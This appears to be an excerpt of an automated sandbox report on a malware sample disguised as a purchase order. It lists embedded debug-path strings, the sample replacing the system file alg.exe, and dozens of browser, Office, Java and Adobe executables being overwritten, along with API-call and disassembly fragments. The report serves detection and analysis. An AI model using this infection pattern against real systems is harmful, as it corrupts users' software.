Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2911797634.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2546360470.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2530364880.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source:	Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source:	Binary string: ALG.pdbGCTL source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: alg.exe, 00000003.00000003.2980929452.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 009E7394h	14_2_009E7099
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 009E78DCh	14_2_009E767A
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_009E7E60
